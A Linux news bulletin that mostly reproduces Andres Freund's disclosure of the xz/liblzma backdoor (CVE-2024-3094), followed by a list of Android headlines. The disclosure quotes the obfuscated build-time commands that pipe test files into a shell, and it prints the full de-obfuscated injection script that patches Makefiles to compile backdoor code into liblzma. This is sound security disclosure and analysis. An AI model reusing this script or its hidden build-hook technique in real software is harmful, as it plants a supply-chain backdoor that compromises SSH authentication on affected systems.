Tux Machines Bulletin for Friday, March 29, 2024 ┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅┅ Generated Sat 30 Mar 02:49:57 GMT 2024 Created by Dr. Roy Schestowitz (𝚛𝚘𝚢 (at) 𝚜𝚌𝚑𝚎𝚜𝚝𝚘𝚠𝚒𝚝𝚣 (dot) 𝚌𝚘𝚖) Full hyperlinks for navigation omitted but are fully available in the originals The corresponding HTML versions are at http://news.tuxmachines.org ╒═══════════════════ 𝐈𝐍𝐃𝐄𝐗 ═══════════════════════════════════════════════════╕ ⦿ Tux Machines - A backdoor in xz ⦿ Tux Machines - Android Leftovers ⦿ Tux Machines - Canonical to manually approve new Snap package names ⦿ Tux Machines - coreutils-9.5 released ⦿ Tux Machines - Databases: PostgreSQL, MySQL, and MariaDB ⦿ Tux Machines - Debian vs. Arch Linux: Which is Better for You? ⦿ Tux Machines - Fedora 41 to Adopt Next-Gen DNF5 Package Manager ⦿ Tux Machines - Free, Libre, and Open Source Software Leftovers ⦿ Tux Machines - Games: Scary Picks, Triple-i Initiative, and More ⦿ Tux Machines - IPFire Location: On getting more data for your byte ⦿ Tux Machines - KDE Plasma 6 Experience: A Practical Review ⦿ Tux Machines - Latest LWN Articles Outside Paywall: Kernel and Programming Focus ⦿ Tux Machines - Microsoft and Plagiarism (in Your Face) ⦿ Tux Machines - Open Hardware: Arduino, Raspberry Pi, SparkFun, and More ⦿ Tux Machines - Open Hardware: Purism, Raspberry Pi, NES ⦿ Tux Machines - Openwashing and Microsoft's Awful Security ⦿ Tux Machines - Orange Pi Developer Conference 2024, upcoming Orange Pi SBCs and products ⦿ Tux Machines - Podman 5.0 Release and Red Hat Puff Pieces (or Purchased 'Coverage' in Media) ⦿ Tux Machines - Programming Leftovers ⦿ Tux Machines - Programming Leftovers ⦿ Tux Machines - Red Hat Warns Fedora Linux 40/41 and Rawhide Users About Critical Security Flaw ⦿ Tux Machines - Samba 4.20.0 Available for Download ⦿ Tux Machines - Samba 4.20 Released: Enhancements for Seamless Integration ⦿ Tux Machines - Security Leftovers ⦿ Tux Machines - Security Leftovers ⦿ Tux Machines - The 6 Best Alternatives to SketchUp for Ubuntu ⦿ Tux Machines - The Fairphone 4 Camera Refresh: Before and After ⦿ Tux Machines - Today in Techrights ⦿ Tux Machines - today's howtos ⦿ Tux Machines - today's howtos ⦿ Tux Machines - today's howtos ⦿ Tux Machines - today's leftovers ⦿ Tux Machines - today's leftovers ⦿ Tux Machines - Top Free and Best Free Open Source Podcasts and Crystal Web Frameworks ⦿ Tux Machines - Tor Browser 13.5a6 is Out and Mozilla is Rogue ⦿ Tux Machines - Ubuntu 24.04 Swaps Cheese for GNOME Snapshot and Ubuntu in the Wild ⦿ Tux Machines - Ubuntu Team-Kodi PPA Officially Retired ⦿ Tux Machines - WordPress 6.5 Release Candidate 4 ䷼ Bulletin articles (as HTML) to comment on (requires login): https://news.tuxmachines.org/n/2024/03/29/A_backdoor_in_xz.shtml https://news.tuxmachines.org/n/2024/03/29/Android_Leftovers.shtml https://news.tuxmachines.org/n/2024/03/29/Canonical_to_manually_approve_new_Snap_package_names.shtml https://news.tuxmachines.org/n/2024/03/29/coreutils_9_5_released.shtml https://news.tuxmachines.org/n/2024/03/29/Databases_PostgreSQL_MySQL_and_MariaDB.shtml https://news.tuxmachines.org/n/2024/03/29/Debian_vs_Arch_Linux_Which_is_Better_for_You.shtml https://news.tuxmachines.org/n/2024/03/29/Fedora_41_to_Adopt_Next_Gen_DNF5_Package_Manager.shtml https://news.tuxmachines.org/n/2024/03/29/Free_Libre_and_Open_Source_Software_Leftovers.shtml https://news.tuxmachines.org/n/2024/03/29/Games_Scary_Picks_Triple_i_Initiative_and_More.shtml https://news.tuxmachines.org/n/2024/03/29/IPFire_Location_On_getting_more_data_for_your_byte.shtml https://news.tuxmachines.org/n/2024/03/29/KDE_Plasma_6_Experience_A_Practical_Review.shtml https://news.tuxmachines.org/n/2024/03/29/Latest_LWN_Articles_Outside_Paywall_Kernel_and_Programming_Focu.shtml https://news.tuxmachines.org/n/2024/03/29/Microsoft_and_Plagiarism_in_Your_Face.shtml https://news.tuxmachines.org/n/2024/03/29/Open_Hardware_Arduino_Raspberry_Pi_SparkFun_and_More.shtml https://news.tuxmachines.org/n/2024/03/29/Open_Hardware_Purism_Raspberry_Pi_NES.shtml https://news.tuxmachines.org/n/2024/03/29/Openwashing_and_Microsoft_s_Awful_Security.shtml https://news.tuxmachines.org/n/2024/03/29/Orange_Pi_Developer_Conference_2024_upcoming_Orange_Pi_SBCs_and.shtml https://news.tuxmachines.org/n/2024/03/29/Podman_5_0_Release_and_Red_Hat_Puff_Pieces_or_Purchased_Coverag.shtml https://news.tuxmachines.org/n/2024/03/29/Programming_Leftovers.1.shtml https://news.tuxmachines.org/n/2024/03/29/Programming_Leftovers.shtml https://news.tuxmachines.org/n/2024/03/29/Red_Hat_Warns_Fedora_Linux_40_41_and_Rawhide_Users_About_Critic.shtml https://news.tuxmachines.org/n/2024/03/29/Samba_4_20_0_Available_for_Download.shtml https://news.tuxmachines.org/n/2024/03/29/Samba_4_20_Released_Enhancements_for_Seamless_Integration.shtml https://news.tuxmachines.org/n/2024/03/29/Security_Leftovers.1.shtml https://news.tuxmachines.org/n/2024/03/29/Security_Leftovers.shtml https://news.tuxmachines.org/n/2024/03/29/The_6_Best_Alternatives_to_SketchUp_for_Ubuntu.shtml https://news.tuxmachines.org/n/2024/03/29/The_Fairphone_4_Camera_Refresh_Before_and_After.shtml https://news.tuxmachines.org/n/2024/03/29/Today_in_Techrights.shtml https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.1.shtml https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.2.shtml https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.shtml https://news.tuxmachines.org/n/2024/03/29/today_s_leftovers.1.shtml https://news.tuxmachines.org/n/2024/03/29/today_s_leftovers.shtml https://news.tuxmachines.org/n/2024/03/29/Top_Free_and_Best_Free_Open_Source_Podcasts_and_Crystal_Web_Fra.shtml https://news.tuxmachines.org/n/2024/03/29/Tor_Browser_13_5a6_is_Out_and_Mozilla_is_Rogue.shtml https://news.tuxmachines.org/n/2024/03/29/Ubuntu_24_04_Swaps_Cheese_for_GNOME_Snapshot_and_Ubuntu_in_the_.shtml https://news.tuxmachines.org/n/2024/03/29/Ubuntu_Team_Kodi_PPA_Officially_Retired.shtml https://news.tuxmachines.org/n/2024/03/29/WordPress_6_5_Release_Candidate_4.shtml ䷩ 𝚕𝚒𝚗𝚎 127 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/A_backdoor_in_xz.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/A_backdoor_in_xz.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ A backdoor in xz⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 Andres Freund has posted a detailed investigation into a backdoor that was shipped with versions 5.6.0 and 5.6.1 of the xz compression utility. It appears that the malicious code may be aimed at allowing SSH authentication to be bypassed. Read_on Full message: * ⚓ [oss-security]_backdoor_in_upstream_xz/liblzma_leading_to_ssh_server compromise⠀⇛ Hi, After observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors) I figured out the answer: The upstream xz repository and the xz tarballs have been backdoored. At first I thought this was a compromise of debian's package, but it turns out to be upstream. == Compromised Release Tarball == One portion of the backdoor is *solely in the distributed tarballs*. For easier reference, here's a link to debian's import of the tarball, but it is also present in the tarballs for 5.6.0 and 5.6.1: https://salsa.debian.org/debian/xz-utils/-/blob/debian/un... That line is *not* in the upstream source of build-to-host, nor is build-to-host used by xz in git. However, it is present in the tarballs released upstream, except for the "source code" links, which I think github generates directly from the repository contents: https://github.com/tukaani-project/xz/releases/tag/v5.6.0 https://github.com/tukaani-project/xz/releases/tag/v5.6.1 This injects an obfuscated script to be executed at the end of configure. This script is fairly obfuscated and data from "test" .xz files in the repository. This script is executed and, if some preconditions match, modifies $builddir/src/liblzma/Makefile to contain am__test = bad-3-corrupt_lzma2.xz ... am__test_dir=$(top_srcdir)/tests/files/$(am__test) ... sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1 which ends up as ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1; ... Leaving out the "| bash" that produces ####Hello#### #��Z�.hj� eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head - c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head - c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/ null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good- large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh ####World#### After de-obfuscation this leads to the attached injected.txt. == Compromised Repository == The files containing the bulk of the exploit are in an obfuscated form in tests/files/bad-3-corrupt_lzma2.xz tests/files/good-large_compressed.lzma committed upstream. They were initially added in https://github.com/tukaani-project/xz/commit/cf44e4b7f5df... Note that the files were not even used for any "tests" in 5.6.0. Subsequently the injected code (more about that below) caused valgrind errors and crashes in some configurations, due the stack layout differing from what the backdoor was expecting. These issues were attempted to be worked around in 5.6.1: https://github.com/tukaani-project/xz/commit/e5faaebbcf02... https://github.com/tukaani-project/xz/commit/72d2933bfae5... https://github.com/tukaani-project/xz/commit/82ecc538193b... For which the exploit code was then adjusted: https://github.com/tukaani-project/xz/commit/6e636819e8f0... Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system. Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the "fixes" mentioned above. Florian Weimer first extracted the injected code in isolation, also attached, liblzma_la-crc64-fast.o, I had only looked at the whole binary. Thanks! == Affected Systems == The attached de-obfuscated script is invoked first after configure, where it decides whether to modify the build process to inject the code. These conditions include targeting only x86-64 linux: if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then Building with gcc and the gnu linker if test "x$GCC" != 'xyes' > /dev/null 2>&1;then exit 0 fi if test "x$CC" != 'xgcc' > /dev/null 2>&1;then exit 0 fi LDv=$LD" -v" if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then exit 0 Running as part of a debian or RPM package build: if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then Particularly the latter is likely aimed at making it harder to reproduce the issue for investigators. Due to the working of the injected code (see below), it is likely the backdoor can only work on glibc based systems. Luckily xz 5.6.0 and 5.6.1 have not yet widely been integrated by linux distributions, and where they have, mostly in pre-release versions. == Observing Impact on openssh server == With the backdoored liblzma installed, logins via ssh become a lot slower. time ssh nonexistant@localhost before: nonexistant@localhost: Permission denied (publickey). before: real 0m0.299s user 0m0.202s sys 0m0.006s after: nonexistant@localhost: Permission denied (publickey). real 0m0.807s user 0m0.202s sys 0m0.006s openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma. Initially starting sshd outside of systemd did not show the slowdown, despite the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder. Observed requirements for the exploit: a) TERM environment variable is not set b) argv[0] needs to be /usr/sbin/sshd c) LD_DEBUG, LD_PROFILE are not set d) LANG needs to be set e) Some debugging environments, like rr, appear to be detected. Plain gdb appears to be detected in some situations, but not others To reproduce outside of systemd, the server can be started with a clear environment, setting only the required variable: env -i LANG=en_US.UTF-8 /usr/sbin/sshd -D In fact, openssh does not need to be started as a server to observe the slowdown: slow: env -i LANG=C /usr/sbin/sshd -h (about 0.5s on my older system) fast: env -i LANG=C TERM=foo /usr/sbin/sshd -h env -i LANG=C LD_DEBUG=statistics /usr/sbin/sshd -h ... (about 0.01s on the same system) It's possible that argv[0] other /usr/sbin/sshd also would have effect - there are obviously lots of servers linking to libsystemd. == Analyzing the injected code == I am *not* a security researcher, nor a reverse engineer. There's lots of stuff I have not analyzed and most of what I observed is purely from observation rather than exhaustively analyzing the backdoor code. To analyze I primarily used "perf record -e intel_pt//ub" to observe where execution diverges between the backdoor being active and not. Then also gdb, setting breakpoints before the divergence. The backdoor initially intercepts execution by replacing the ifunc resolvers crc32_resolve(), crc64_resolve() with different code, which calls _get_cpuid(), injected into the code (which previously would just be static inline functions). In xz 5.6.1 the backdoor was further obfuscated, removing symbol names. These functions get resolved during startup, because sshd is built with -Wl,-z,now, leading to all symbols being resolved early. If started with LD_BIND_NOT=1 the backdoor does not appear to work. Below crc32_resolve() _get_cpuid() does not do much, it just sees that a 'completed' variable is 0 and increments it, returning the normal cpuid result (via a new _cpuid()). It gets to be more interesting during crc64_resolve(). In the second invocation crc64_resolve() appears to find various information, like data from the dynamic linker, program arguments and environment. Then it perform various environment checks, including those above. There are other checks I have not fully traced. If the above decides to continue, the code appears to be parsing the symbol tables in memory. This is the quite slow step that made me look into the issue. Notably liblzma's symbols are resolved before many of the other libraries, including the symbols in the main sshd binary. This is important because symbols are resolved, the GOT gets remapped read-only thanks to -Wl,-z,relro. To be able to resolve symbols in libraries that have not yet loaded, the backdoor installs an audit hook into the dynamic linker, which can be observed with gdb using watch _rtld_global_ro._dl_naudit It looks like the audit hook is only installed for the main binary. That hook gets called, from _dl_audit_symbind, for numerous symbols in the main binary. It appears to wait for "RSA_public_decrypt@got.plt" to be resolved. When called for that symbol, the backdoor changes the value of RSA_public_decrypt@got.plt to point to its own code. It does not do this via the audit hook mechanism, but outside of it. For reasons I do not yet understand, it does change sym.st_value *and* the return value of from the audit hook to a different value, which leads _dl_audit_symbind() to do nothing - why change anything at all then? After that the audit hook is uninstalled again. It is possible to change the got.plt contents at this stage because it has not (and can't yet) been remapped to be read-only. I suspect there might be further changes performed at this stage. == Impact on sshd == The prior section explains that RSA_public_decrypt@got.plt was redirected to point into the backdoor code. The trace I was analyzing indeed shows that during a pubkey login the exploit code is invoked: sshd 1736357 [010] 714318.734008: 1 branches:uH: 5555555ded8c ssh_rsa_verify+0x49c (/usr/sbin/sshd) => 5555555612d0 RSA_public_decrypt@plt+0x0 (/usr/sbin/sshd) The backdoor then calls back into libcrypto, presumably to perform normal authentication sshd 1736357 [010] 714318.734009: 1 branches:uH: 7ffff7c137cd [unknown] (/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.0) => 7ffff792a2b0 RSA_get0_key+0x0 (/usr/lib/x86_64-linux-gnu/libcrypto.so.3) I have not yet analyzed precisely what is being checked for in the injected code, to allow unauthorized access. Since this is running in a pre-authentication context, it seems likely to allow some form of access or other form of remote code execution. I'd upgrade any potentially vulnerable system ASAP. == Bug reports == Given the apparent upstream involvement I have not reported an upstream bug. As I initially thought it was a debian specific issue, I sent a more preliminary report to security@debian.org. Subsequently I reported the issue to distros@. CISA was notified by a distribution. Red Hat assigned this issue CVE-2024-3094. == Detecting if installation is vulnerable == Vegard Nossum wrote a script to detect if it's likely that the ssh binary on a system is vulnerable, attached here. Thanks! Greetings, Andres Freund P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections" C="pic_flag=\" $P\"" O="^pic_flag=\" -fPIC -DPIC\"$" R="is_arch_extension_supported" x="__get_cpuid(" p="good-large_compressed.lzma" U="bad-3-corrupt_lzma2.xz" eval $zrKcVq if test -f config.status; then eval $zrKcSS eval `grep ^LD=\'\/ config.status` eval `grep ^CC=\' config.status` eval `grep ^GCC=\' config.status` eval `grep ^srcdir=\' config.status` eval `grep ^build=\'x86_64 config.status` eval `grep ^enable_shared=\'yes\' config.status` eval `grep ^enable_static=\' config.status` eval `grep ^gl_path_map=\' config.status` eval $zrKccj if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then exit 0 fi if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > / dev/null 2>&1;then exit 0 fi if test "x$enable_shared" != "xyes";then exit 0 fi if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > / dev/null 2>&1; then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > / dev/null 2>&1; then exit 0 fi if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then exit 0 fi if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then exit 0 fi if test "x$GCC" != 'xyes' > /dev/null 2>&1;then exit 0 fi if test "x$CC" != 'xgcc' > /dev/null 2>&1;then exit 0 fi LDv=$LD" -v" if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then exit 0 fi if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then exit 0 fi if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then exit 0 fi if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then eval $zrKcst j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4" if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi z="^am__uninstall_files_from_dir = {" if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi w="^am__install_max =" if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi E=$z if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi Q="^am__vpath_adj_setup =" if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi M="^am__include = include" if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi L="^all: all-recursive$" if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi m="^LTLIBRARIES = \$(lib_LTLIBRARIES)" if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi u="AM_V_CCLD = \$(am__v_CCLD_\$(V))" if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then exit 0 fi if ! grep -qs "$O" libtool > /dev/null 2>&1;then exit 0 fi eval $zrKcTy b="am__test = $U" sed -i "/$j/i$b" src/liblzma/Makefile || true d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'` b="am__strip_prefix = $d" sed -i "/$w/i$b" src/liblzma/Makefile || true b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)" sed -i "/$E/i$b" src/liblzma/Makefile || true b="\$(top_srcdir)/tests/files/\$(am__test)" s="am__test_dir=$b" sed -i "/$Q/i$s" src/liblzma/Makefile || true h="-Wl,--sort-section=name,-X" if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > / dev/null 2>&1;then h=$h",-z,now" fi j="liblzma_la_LDFLAGS += $h" sed -i "/$L/i$j" src/liblzma/Makefile || true sed -i "s/$O/$C/g" libtool || true k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))" sed -i "s/$u/$k/" src/liblzma/Makefile || true l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\ export top_srcdir='\$(top_srcdir)'; \\\\\n\ export CC='\$(CC)'; \\\\\n\ export DEFS='\$(DEFS)'; \\\\\n\ export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\ export INCLUDES='\$(INCLUDES)'; \\\\\n\ export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\ export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\ export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\ export CFLAGS='\$(CFLAGS)'; \\\\\n\ export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\ export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\ export libdir='\$(libdir)'; \\\\\n\ export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\ export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\ sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1"; sed -i "/$m/i$l" src/liblzma/Makefile || true eval $zrKcHD fi elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/ liblzma_la-crc32_fast.o); then eval $zrKcKQ if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/ crc64_fast.c; then exit 0 fi if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/ crc32_fast.c; then exit 0 fi if ! grep -qs "$R" $top_srcdir/src/liblzma/check/ crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$x" $top_srcdir/src/liblzma/check/ crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$C" ../../libtool; then exit 0 fi if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z - Wl,now" > /dev/null 2>&1;then exit 0 fi if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then exit 0 fi N=0 W=0 Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/ gettext.m4` eval $zrKcjv if test -z "$Y"; then N=0 W=88792 else N=88792 W=0 fi xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\ (.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i /dev/null 2>&1) && head -c +$W) > liblzma_la- crc64-fast.o || true if ! test -f liblzma_la-crc64-fast.o; then exit 0 fi cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined (BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported' eval $yosA if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \ sed "/include \"crc_x86_clmul.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/ dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la- crc64_fast.o 2>/dev/null; then cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true eval $BPep if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \ sed "/include \"crc32_arm64.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/ dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then eval $RgYB if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then if test ! -f .libs/liblzma.so; then mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la- crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la- crc64_fast.o || true fi rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la- crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la- crc64_fast.o || true fi rm -f .libs/liblzma_la-crc32-fast.o || true rm -f .libs/liblzma_la-crc64-fast.o || true else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la- crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la- crc64_fast.o || true fi else mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la- crc64_fast.o || true fi rm -f liblzma_la-crc64-fast.o || true fi eval $DHLd ䷩ 𝚕𝚒𝚗𝚎 899 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Android_Leftovers.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Android_Leftovers.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Android Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇Android_phones⦈_ * ⚓ 5.5G_networks_are_here,_and_so_are_the_first_Android_phones_to_support it_-_Android_Authority⠀⇛ * ⚓ Chrome_will_remind_you_about_the_many_tabs_you've_left_open_on Android⠀⇛ * ⚓ Glorious_new_renders_showcase_Motorola's_true_Edge_50_Ultra_flagship ahead_of_launch_-_PhoneArena⠀⇛ * ⚓ Original_Pixel_Dictated_Google's_7_Year_Android_Commitment⠀⇛ * ⚓ Chrome_on_Android_preps_a_feature_to_help_you_manage_all_those_tabs_| Android_Central⠀⇛ * ⚓ Android_Auto_gets_a_wireless_adapter_compatibility_test⠀⇛ * ⚓ New_Android_phone_spotted_online_–_Sony_or_phoney?_|_T3⠀⇛ * ⚓ Android_15_may_let_you_block_your_location_from_your_cell_phone_carrier -_PhoneArena⠀⇛ * ⚓ Sorry,_Android_15's_new_frame_rate_override_feature_won't_work_for most_games_-_Android_Authority⠀⇛ * ⚓ Android_15_may_protect_you_from_rogue_'stingray'_tracking_devices -_Android_Authority⠀⇛ * ⚓ Android_15_may_let_you_control_when_your_location_is_shared_with carriers_-_Android_Authority⠀⇛ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⣠⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣾⣾⣿⠟⣉⣥⠄⠀⠢⣬⣍⡛⢿⣿⣿⣿⡏⠀⠀⣰⣿⡿⠿⣷⣦⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 